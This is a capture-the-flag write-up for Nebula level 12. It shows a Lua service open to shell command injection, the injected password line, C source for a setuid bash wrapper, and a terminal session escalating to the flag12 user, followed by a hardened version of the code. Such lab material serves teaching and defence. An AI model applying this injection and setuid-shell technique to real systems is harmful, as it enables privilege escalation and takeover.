ExploitExercises_Nebula_Level12

Source: Internet. Editor: 程序博客网. Time: 2024/06/05 16:31

The program's source is a Lua script:

local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
  -- the client-supplied password is concatenated into a shell command unescaped
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end

while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local line, err = client:receive()
  if not err then
      print("trying " .. line) -- log from where ;\
      local h = hash(line)

      if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
          client:send("Better luck next time\n");
      else
          client:send("Congrats, your token is 413**CARRIER LOST**\n")
      end
  end

  client:close()
end

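hash() concatenates the password into the shell command given to io.popen without escaping, so the password field allows command injection: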

1. Create shell.c in the /tmp directory:

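#define _GNU_SOURCE   /* declares setresgid() and setresuid() */
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;

  /* take the effective IDs granted by the setuid/setgid bits */
  gid = getegid();
  uid = geteuid();

  /* make them the real, effective and saved IDs */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/bin/bash");
  return 0;
}
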
2. Inject through the password parameter:

level12@nebula:/tmp$ nc localhost 50001
Password: 1; gcc -o /tmp/shell /tmp/shell.c; cp /tmp/shell /home/flag12; chmod +s /home/flag12/shell echo 1

3. Then run /home/flag12/shell:

level12@nebula:/tmp$ cd /home/flag12
level12@nebula:/home/flag12$ ls -l
total 9
-rw-r--r-- 1 root   root    685 2011-11-20 21:22 flag12.lua
-rwsr-sr-x 1 flag12 flag12 7321 2016-12-29 19:54 shell
level12@nebula:/home/flag12$ date
Thu Dec 29 19:55:36 PST 2016
level12@nebula:/home/flag12$ ./shell
flag12@nebula:/home/flag12$
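
The fix for the injection shown above, as an added example that is not part of the original post or of the level's own code: hash() keeps its sha1sum pipeline but passes the password to the shell as quoted data. The helper names sh_quote, acceptable, vulnerable_cmd and hardened_cmd, the 128-byte limit and the sample inputs are assumptions made for this illustration.

```lua
-- Added example: flag12.lua's hash() with the password treated strictly as data.

-- Quote s for POSIX sh: wrap it in single quotes and rewrite each embedded
-- single quote as '\'' (close quote, escaped quote, reopen quote).
local function sh_quote(s)
  return "'" .. s:gsub("'", "'\\''") .. "'"
end

-- Assumed policy for this example: printable ASCII only, 1 to 128 bytes.
local function acceptable(line)
  return #line > 0 and #line <= 128 and not line:find("[^ -~]")
end

-- Command builders, split out so the two strings can be compared.
local function vulnerable_cmd(password)   -- the construction used in flag12.lua
  return "echo " .. password .. " | sha1sum"
end

local function hardened_cmd(password)
  -- printf '%s\n' emits the password plus a newline, as echo does for an
  -- ordinary password, so the digest stored in the script stays valid.
  return "printf '%s\\n' " .. sh_quote(password) .. " | sha1sum"
end

local function hash(password)
  if not acceptable(password) then
    return nil, "rejected"
  end
  local prog = assert(io.popen(hardened_cmd(password), "r"))
  local data = prog:read("*all")
  prog:close()
  return string.sub(data, 1, 40)
end

-- Constructed inputs: an ordinary guess and one containing shell metacharacters.
for _, line in ipairs({ "letmein", "x; echo INJECTED; echo '" }) do
  print("input:      " .. line)
  print("vulnerable: " .. vulnerable_cmd(line))
  print("hardened:   " .. hardened_cmd(line))
  print("digest:     " .. tostring(hash(line)))
end
```

Computing SHA-1 inside the Lua process with a hashing library would remove the shell, and with it the need for quoting, entirely.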



